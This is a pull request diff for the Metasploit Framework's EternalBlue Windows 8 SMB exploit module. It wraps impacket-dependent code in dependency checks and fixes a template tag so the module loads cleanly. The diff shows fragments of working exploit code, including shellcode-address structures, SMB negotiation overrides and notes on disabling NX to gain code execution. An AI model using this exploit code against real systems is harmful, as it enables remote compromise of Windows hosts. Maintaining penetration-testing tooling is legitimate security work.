### PR TITLE
address missed impacket dependency check

### DIFF
--- a/lib/msf/core/modules/external/templates/remote_exploit_cmd_stager.erb
+++ b/lib/msf/core/modules/external/templates/remote_exploit_cmd_stager.erb
@@ -2,7 +2,7 @@ require 'msf/core/modules/external/bridge'
 require 'msf/core/module/external'
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = <% meta[:rank] %>
+  Rank = <%= meta[:rank] %>
 
   include Msf::Module::External
   include Msf::Exploit::CmdStager

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -319,7 +319,8 @@ fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)  # shellcode addr
 
 def getNTStatus(self):
     return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
-setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
+if not dependencies_missing:
+    setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
 
 def sendEcho(conn, tid, data):
     pkt = smb.NewSMBPacket()
@@ -342,13 +343,14 @@ def sendEcho(conn, tid, data):
 
 
 # override SMB.neg_session() to allow forcing ntlm authentication
-class MYSMB(smb.SMB):
-    def __init__(self, remote_host, use_ntlmv2=True):
-        self.__use_ntlmv2 = use_ntlmv2
-        smb.SMB.__init__(self, remote_host, remote_host)
+if not dependencies_missing:
+    class MYSMB(smb.SMB):
+        def __init__(self, remote_host, use_ntlmv2=True):
+            self.__use_ntlmv2 = use_ntlmv2
+            smb.SMB.__init__(self, remote_host, remote_host)
 
-    def neg_session(self, extended_security = True, negPacket = None):
-        smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
+        def neg_session(self, extended_security = True, negPacket = None):
+            smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
 
 def createSessionAllocNonPaged(target, size, username, password):
     conn = MYSMB(target, use_ntlmv2=False)  # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
@@ -412,18 +414,19 @@ def createSessionAllocNonPaged(target, size, username, password):
 
 # Note: impacket-0.9.15 struct has no ParameterDisplacement
 ############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
-class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
-    structure = (
-        ('TotalParameterCount','<H=0'),
-        ('TotalDataCount','<H'),
-        ('ParameterCount','<H=0'),
-        ('ParameterOffset','<H=0'),
-        ('ParameterDisplacement','<H=0'),
-        ('DataCount','<H'),
-        ('DataOffset','<H'),
-        ('DataDisplacement','<H=0'),
-        ('FID','<H=0'),
-    )
+if not dependencies_missing:
+    class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
+        structure = (
+            ('TotalParameterCount','<H=0'),
+            ('TotalDataCount','<H'),
+            ('ParameterCount','<H=0'),
+            ('ParameterOffset','<H=0'),
+            ('ParameterDisplacement','<H=0'),
+            ('DataCount','<H'),
+            ('DataOffset','<H'),
+            ('DataDisplacement','<H=0'),
+            ('FID','<H=0'),
+       )
 
 def send_trans2_second(conn, tid, data, displacement):
     pkt = smb.NewSMBPacket()

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -54,7 +54,7 @@ metadata = {
         - The idea is from "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" (see link in reference)
         - The exploit is also the same but we need to trigger bug twice
         - First trigger, set MDL.MappedSystemVa to target pte address
-          - Write '\x00' to disable the NX flag
+        - Write '\\x00' to disable the NX flag
         - Second trigger, do the same as Windows 7 exploit
         - From my test, if exploit disable NX successfully, I always get code execution
     ''',


### PR DESCRIPTION
Fix module cache load for `ms17_010_eternalblue_win8` due to missing dependency check

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] check `~/.msf4/logs/framework.log` for error loading `ms17_010_eternalblue_win8`
- [x] **Verify** no errors found in latest startup
